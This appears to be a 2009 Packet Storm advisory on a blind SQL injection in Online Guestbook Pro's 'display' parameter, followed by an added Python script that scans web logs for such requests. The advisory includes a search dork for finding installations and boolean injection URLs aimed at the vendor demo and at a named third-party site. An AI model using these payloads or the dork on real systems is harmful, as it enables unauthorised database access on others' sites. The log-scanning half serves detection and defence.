Online Guestbook Pro SQL Injection

2009-04-17T00:00:00
ID PACKETSTORM:76780
Type packetstorm
Reporter Hussin X
Modified 2009-04-17T00:00:00

Description

                                        
`Begin :D  
  
Online Guestbook Pro (display) Blind SQL Injection Vulnerability  
  
  
{____________________________________}  
Author: Hussin X  
  
Home : WwW.IQ-TY.CoM   
  
email: darkangel_g85[at]Yahoo[DoT]com  
{____________________________________}  
  
  
  
script : http://www.esoftpro.com/web_scripts_online_guestbook_pro.php  
  
DorK : Powered by Online Guestbook Pro  
  
  
  
  
Demo :  
  
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=5  
  
http://www.esoftpro.com/demo/OGP/ogp_show.php?display=10 and substring(@@version,1,1)=4  
  
BuT Results = Forbidden :D  
  
  
demo to any web  
  
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=5  
  
http://www.musicandfriends.ca/guestbook/ogp_show.php?display=10 and substring(@@version,1,1)=4  
  
  
  
  
  
Greetz to :{ IQ-SecuritY members } { | FAHD | CraCkEr | jiko | str0ke | Cyber-Zone | kadmiwe | ahmed hassan | Sakab }  
  
end.  
  
  
`
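
A defensive check for the request pattern shown in the advisory, as an added example that is not part of the original advisory or the vendor's code: it scans web access logs for requests to `ogp_show.php` whose `display` parameter is not a plain integer. The combined log format, the sample lines, the function names and the assumption that a legitimate `display` value is a short decimal integer (as in `display=10`) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format log line: "METHOD target HTTP/x.y".
# The target is matched lazily so unencoded spaces in the URL are kept.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SCRIPT = "ogp_show.php"   # script named in the advisory
PARAM = "display"         # parameter named in the advisory


def suspicious_display(target):
    """Return the decoded non-integer `display` values in a request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/" + SCRIPT):
        return []
    # parse_qs percent-decodes and turns '+' into a space, so encoded
    # variants of the same value are normalised before the check.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    return [v for v in values if not re.fullmatch(r"[0-9]{1,10}", v)]


def scan(lines):
    """Yield (client_ip, value) for each log line with a bad `display`."""
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for value in suspicious_display(m.group(1)):
            yield line.split(" ", 1)[0], value


# Constructed sample log lines (documentation IP ranges, made-up paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Apr/2009:10:00:01 +0000] "GET /guestbook/ogp_show.php?display=10 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Apr/2009:10:00:05 +0000] "GET /guestbook/ogp_show.php?display=10%20and%20substring(@@version,1,1)=5 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [17/Apr/2009:10:00:06 +0000] "GET /guestbook/ogp_show.php?display=10+and+substring(@@version,1,1)=4 HTTP/1.1" 200 312',
    '203.0.113.4 - - [17/Apr/2009:10:01:00 +0000] "GET /guestbook/index.php?display=abc HTTP/1.1" 200 800',
]

if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}  non-integer {PARAM}={value!r}")
```
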